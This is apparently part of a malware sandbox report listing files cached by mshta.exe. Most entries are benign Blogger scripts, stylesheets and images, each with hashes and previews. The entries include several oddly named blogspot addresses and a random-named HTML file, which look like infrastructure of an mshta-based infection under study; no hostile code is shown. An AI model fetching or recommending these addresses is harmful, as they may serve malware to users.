                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\281434096-static_pages[1].css
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3812
                                                                                                                                                                                                            Entropy (8bit):5.167428807218489
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Tpnj64Z4HufeAA4DhRXRBd031AkDhRXRBd039YAH/hv:xjnRfp
                                                                                                                                                                                                            MD5:B3E61DF6E41A93485461F77324FCD93E
                                                                                                                                                                                                            SHA1:46EFB1044FF1CB854E02BCB49ADA1D501CE0AFF4
                                                                                                                                                                                                            SHA-256:0FC52EF116F03FD95F9857856F1E2CBDFA2CACC398E066DB0D8D5481739BC2D7
                                                                                                                                                                                                            SHA-512:2CEB087B5B5122A2CDC6EDF8CC0613A8F2671091E8524C8E8F312BDCF39A494FD260F84E0C8EFAD1A09738DF4896C6C39964B3A26463628398D6111DBE68AB3C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
                                                                                                                                                                                                            Preview: body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0}a{text-decoration:none}table{border-collapse:collapse;border-spacing:0}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var{font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th{text-align:left}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal}q:before,q:after{content:''}abbr,acronym{border:0}body{font-family:"open sans",arial,sans-serif;line-height:1.54}h1{font-size:20px;font-weight:300;margin:20px 0;color:#f60}h2{font-size:24px;font-weight:700;margin:2em 0 1em 0}h3{font-size:14px;font-weight:700;margin:1.2em 0 .6em 0}p{margin-bottom:2em}ul{padding:0}.maia-footer h5{font-size:13px;font-weight:700;margin:1.236em 0 .618em;text-transform:uppercase}.footer-links{list-style-type:none;padding:0}.footer-links a:link,.footer-links a:visited{color:#999;text-decoration:none}#footer a:hover{color:#ff9434}#copyright{float:right}.sign-in{float:right}
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\3101730221-analytics_autotrack[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):25296
                                                                                                                                                                                                            Entropy (8bit):5.292580915400208
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:xkt9hXjJ9UP+8qeyDVrQi7xD21qTOxcVB9yNGY:xc9hXjJYyDVrQi7xD21qTfBg
                                                                                                                                                                                                            MD5:094CE5DCACCF632457AE9FBF4F325399
                                                                                                                                                                                                            SHA1:87E144F51C7BEE2D624709C8F596037A92D06E66
                                                                                                                                                                                                            SHA-256:21CC4DC6C3C01B84C808004173F42E3ED1B4F09551A10D69B4CEC7394A1590E6
                                                                                                                                                                                                            SHA-512:5E7EBEE0AE1C7F421687406891DBF418794E4709C048D6AA29E9D104F9AFF13112EEFF64B4A5006C092E07B968316663BE014181E63A294D896FFC720C6B8837
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
                                                                                                                                                                                                            Preview: //third_party/javascript/autotrack/autotrack.js./**. * @license. * Copyright 2016 Google Inc. All Rights Reserved.. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. */.(function(){var f,aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(c.get||c.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[b]=c.value)},k="undefined"!=typeof window&&window===this?this:"undefined"!=typeof global&&null!=
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\376796862-ieretrofit[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):27730
                                                                                                                                                                                                            Entropy (8bit):5.474636049966948
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:OTP9b2YDWsss8L/LFB9jxCXhk5tj3c09VMPbgjKWgDCP2fSxsslP1eFMWbUk11Kw:OTg1HOWPgDCPEklwFMOUC18osa7
                                                                                                                                                                                                            MD5:948E0FDD7E43A410514074A85F8F830F
                                                                                                                                                                                                            SHA1:8539D93757C0B546863C42C2682696182F951476
                                                                                                                                                                                                            SHA-256:59E1456632564F9C0044D7AC65C979AF6D7BF9548621F881E5B25659612EFF72
                                                                                                                                                                                                            SHA-512:19D00FEA16B7226E96A8858771154248B2AF95840179B40F241050FB5CAF413BD093BF26A6F76A6FAB577DC804C5127FE81E86D023E9F7D1B8A25C10FF76752E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
                                                                                                                                                                                                            Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=' coordorigin="0 0" coordsize="',ba=' endcap="flat"',u=" l ",w=" m ",ca='"><g_vml_:fill color="',fa=":0;width:",ha='<g_vml_:shape fillcolor="',ia="borderRadius_bl",ja="borderRadius_br",ka="borderRadius_tl",la="borderRadius_tr",ma="borderWidth_bottom",x="borderWidth_left",na="borderWidth_right",y="borderWidth_top",z="none",A="rgba(",oa="shadowBlurRadius",pa='style="position:absolute;top:0;',B="transparent",C="{borderColor}",D="{borderWidth}",E,G=this||self,qa=function(a,b,e,c){a=a.split(".");.c=c||G;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)if(a.length||void 0===b)c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={};else if(!e&&H(b)&&H(c[d]))for(var f in b)b.hasOwnProperty(f)&&(c[d][f]=b[f]);else c[d]=b},ra=function(){},H=function(a){var b=typeof a;return"object"==b&&null!=a||"function"==b},J=function(a){return Object.prototype.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\84067855-widgets[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144902
                                                                                                                                                                                                            Entropy (8bit):5.570242774242284
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sf0jKyeUNEWa9MW7zShH4CUMFvkcPe611Cg3x6sMuXgktbdrvh/0ie2zKQ+TtY7g:SnU4CXNew1Cox8210ipOz4m
                                                                                                                                                                                                            MD5:63642B890AD1CBD4C33DF076775147A8
                                                                                                                                                                                                            SHA1:501936F025C1D9F1EA5401E9743632C6C1284A71
                                                                                                                                                                                                            SHA-256:A44D152363BB65AFA637F41D115A093D8E268958D7B69B379A5D205291ADA5C4
                                                                                                                                                                                                            SHA-512:3E895BE361F4EB95C073D284D81D88EC9D40FA66E87797DB38FAC162CDBBA1FBD256B436F738C5D60612C62CEBEA4DB84B2392BDE0D5FF1167B4BAD10F8D59CF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: (function(){var aa="&action=",ca=".wikipedia.org",da="CSSStyleDeclaration",ea="Clobbering detected",fa="Edge",ha="Element",ia="GET",ja="Never attached to DOM.",ka="SPAN",la="STYLE",ma="SW_READER_LIST_",na="SW_READER_LIST_CLOSED_",oa="Share this post",pa="Symbol.iterator",qa="_blank",ra="about:invalid#zClosurez",sa="about:invalid#zSoyz",ta="attributes",ua="block",va="chooseWidget",wa="click",xa="collapsed",ya="collapsed-backlink",za="collapsible",Aa="comment-editor",Ba="complete",Ca="configure",Da="contact-form-email",.Ea="contact-form-email-message",Fa="contact-form-error-message",Ga="contact-form-error-message-with-border",Ha="contact-form-name",Ia="contact-form-submit",Ja="contact-form-success-message",Ka="contact-form-success-message-with-border",La="data-height",Ma="data-sanitizer-",Na="data-viewurl",Oa="displayModeFull",Pa="displayModeLayout",Qa="displayModeNone",k="div",Ra="dropdown-toggle",Sa="error",Ta="expanded",Ua="expanded-backlink",Va="followers-grid",l="function",Wa="getAt
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\body_gradient_tile_light[1].png
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:PNG image data, 10 x 10, 1-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):95
                                                                                                                                                                                                            Entropy (8bit):4.633118599879715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:yionv//thPlH1kmlS1jmTQ9IyehXhbp:6v/lhPcS5TeIFdhbp
                                                                                                                                                                                                            MD5:3B2A20D5B0BA4CA0C5DD90865AD6B9C4
                                                                                                                                                                                                            SHA1:A90928A16D11D21E112B45B60990A9D7D19CC1D5
                                                                                                                                                                                                            SHA-256:0FDCB4746995F0D5240E5EC11370CB950722A894F3CFF4118AA68CCC92010EDD
                                                                                                                                                                                                            SHA-512:EF256091EE551337B9789E8D55C558D85AF0780C2906FA971A33D36A6F9D78114A573D606DAB086816006E072CEF7029EFE4D47F7BF3BE16007CA464F3281765
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
                                                                                                                                                                                                            Preview: .PNG........IHDR...............].....PLTE...........tRNS..5.....IDAT..c.........L\....IEND.B`.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://startthepartyup.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[2].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://ghostbackbone123.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gradients_light[1].png
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:PNG image data, 20 x 1100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):403
                                                                                                                                                                                                            Entropy (8bit):5.849127564472003
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/74Qlk8WIyzs740Oc5maj4m3YULe3dk:Hgk8uw740OcWAY13dk
                                                                                                                                                                                                            MD5:4F7DE2E6AFEFB125B1F14FA5CDA610EE
                                                                                                                                                                                                            SHA1:57A145F234B504A73F9D55CF39F2231A04719456
                                                                                                                                                                                                            SHA-256:ECB30886406E3F776FF7BC3834DE849944471E626FF148BED2FA389D02866044
                                                                                                                                                                                                            SHA-512:9E3C207F0931EE4C5F48E62670F33D33815CF0779AC5F719017401C20273B4E0403CE03C08643A58BA4C3B023F9C691C34E8FDA776B710DFE8EE3DBFEE7D887B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
                                                                                                                                                                                                            Preview: .PNG........IHDR.......L............ZIDATx......A..A/.h.?0.....q..V...e%.U...V.j...d.%.P.d.%.+.(.%K.,.(.%K.,..%K.,y.d.H.,Y.d.H.,Y.d.J.,Y.d..$.E.d.."Y.d.%.P.d.%.l..%K.l..%K..B.%K..l..%K.,.(.%K.,..%K.,Y.y.."Y.d.F.,Y.d.](Y.d....../.Q$K.,Y.d.%K6.d.%K.,Y.d.S.."Y.d.%K.,Y.d.H.,Y.d.%K.>.....................c+I....U..~.1...d.~)..d.P.o(.7..+.......................o..i........IEND.B`.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3858658042-comment_from_post_iframe[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):13346
                                                                                                                                                                                                            Entropy (8bit):5.405149681041944
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:BqWjbSFO5Og47t7xNycGK7SlV4cjCqN1Yae3CCaJzWTKtTOpY2Dzt8cvtWPXtxQK:BqGSFOsZM61WyV3CCaJIav2F8G2XnQK
                                                                                                                                                                                                            MD5:EE77AB1C7CA023A501E4DA28CCC2915F
                                                                                                                                                                                                            SHA1:F309FB6B570041EE11C830ABA4DD58D586D193B6
                                                                                                                                                                                                            SHA-256:A09131F2885086EB3DEA6A379C43E58C88E683B99FB7CF9CEFDE399DFD68D0FF
                                                                                                                                                                                                            SHA-512:DE42C9F444DC0D617EE12FBACE43F8EB659FBB461A6B03AD851A21FED5B44721D63D66A0802915DA387F0FD1FDD2BC06AA9A4E00FC18E2125B89A3D2238BE6A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
                                                                                                                                                                                                            Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var f="function",k="string",l,n=this||self,p=function(a){var b=typeof a;b="object"!=b?b:a?Array.isArray(a)?"array":b:"null";return"array"==b||"object"==b&&"number"==typeof a.length};var q=Array.prototype.indexOf?function(a,b,c){return Array.prototype.indexOf.call(a,b,c)}:function(a,b,c){c=null==c?0:0>c?Math.max(0,a.length+c):c;if(typeof a===k)return typeof b!==k||1!=b.length?-1:a.indexOf(b,c);for(;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1},r=Array.prototype.forEach?function(a,b,c){Array.prototype.forEach.call(a,b,c)}:function(a,b,c){for(var d=a.length,e=typeof a===k?a.split(""):a,g=0;g<d;g++)g in e&&b.call(c,e[g],g,a)};.function t(a){return Array.prototype.concat.apply([],arguments)};var u;a:{var v=n.navigator;if(v){var w=v.userAgent;if(w){u=w;break a}}u=""}var x=function(a){return-1!=u.indexOf(a)};var y=x("Trident")||x("MSIE");var z=function(a,b){return typeof b===k?a.getElementB
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\blogin[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):287
                                                                                                                                                                                                            Entropy (8bit):7.171262501317191
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtQeA5M/H2XUm2R+sWN/vlaUZpQFS9YI3m6od9IUEoXLbveYGak5sOR:XdyM/H2XUm2YsWN/tBJD3mJT98L
                                                                                                                                                                                                            MD5:2F0617DDC36B03F4723AD04D4891F74E
                                                                                                                                                                                                            SHA1:4A0ED082B77CA3E70DE11FC42AED497A7C067E94
                                                                                                                                                                                                            SHA-256:E036CAB59948C4704421AAA2090E662FFAD53D794FB9C84206FFFA7208591993
                                                                                                                                                                                                            SHA-512:87BC8CF6961E4DCC757188B9E9DD109F4C7201591F80FED28DCD731F3AF79249B3C76CDE020021D38B72C125DDA993D14A092FE9DA6B4382BD60B9BCEBB073DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...........1O.0.....+..6i...T-M)R.J.H0&..X8>+v...IL..s.=.}.<.d.wE6I..r=4..<.....Cc.-[......$.......z~...C.]mBE...|x...._...@.(...'u.H..dI..|.F...=0V....JD...l.+.'%.@..B...t.^.}..J....z..P........t...U).*4.......Kz..2.G$..o.tv_Y..{|]6........-.S'H}.A.H.:.jh!a....Q..B.?.".h....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienotice[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://randikhanaekminar.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienotice[2].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://backbones1234511a.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\css[1].css
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):172
                                                                                                                                                                                                            Entropy (8bit):5.119931778220296
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:0SYWFFWlIYCiF15RI5XwDKLRIHDfFWYhfqzrZqcdJ2dTi8EuRlGwLYRLAK1Yvn:0IFFm15+56Zzhizlpd0celB4zSv
                                                                                                                                                                                                            MD5:C141D007243B3488466496ED83F13B2F
                                                                                                                                                                                                            SHA1:F184CE8D5074D7B510E2A529AECCF0B3DB0F8EBE
                                                                                                                                                                                                            SHA-256:D9427036A7A10029E9B0454939E9BB5095D217AFCFC8EF43E2B49F870B0562EA
                                                                                                                                                                                                            SHA-512:C7482956BA1522ED07C777415571213ED3F746A7FFCC0FFC7B31DB992393559E23E13C5585B3DDD52728D1B943484B3BC8D04FD1DB6C47D9750F84E9DB5E4706
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://fonts.googleapis.com/css?family=Open+Sans:300
                                                                                                                                                                                                            Preview: @font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 300;. src: url(https://fonts.gstatic.com/s/opensans/v18/mem5YaGs126MiZpBA-UN_r8OUuht.eot);.}.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dbgghasdnasdjasgdakgsdhv[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):137
                                                                                                                                                                                                            Entropy (8bit):4.639845182808017
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVvzLURODccZ/vXbvx9nDydD+M5zXKlWnLNGHbjkFSXbKFvNGb:qFzLIeco3XLx92tz5zXKlO87jMSLWQb
                                                                                                                                                                                                            MD5:D86CDDDEC21570C2E24C90E1E4ACE774
                                                                                                                                                                                                            SHA1:6B9A49121E9D26DAD7EB0EB9BF974109A46D944C
                                                                                                                                                                                                            SHA-256:01458D44E9CEAFE97FB50BAC49BB2C3BFA126B6A7F67CD7E2B536487CD41C338
                                                                                                                                                                                                            SHA-512:F48494E39468AD998E188F724AF4E3BFA057384CCE601E14760158CC18339B7FD140625188BC8508C0A1A67FDCB12951ABC83EC8BC5EC98D89C135F1039A8102
                                                                                                                                                                                                            Malicious:false
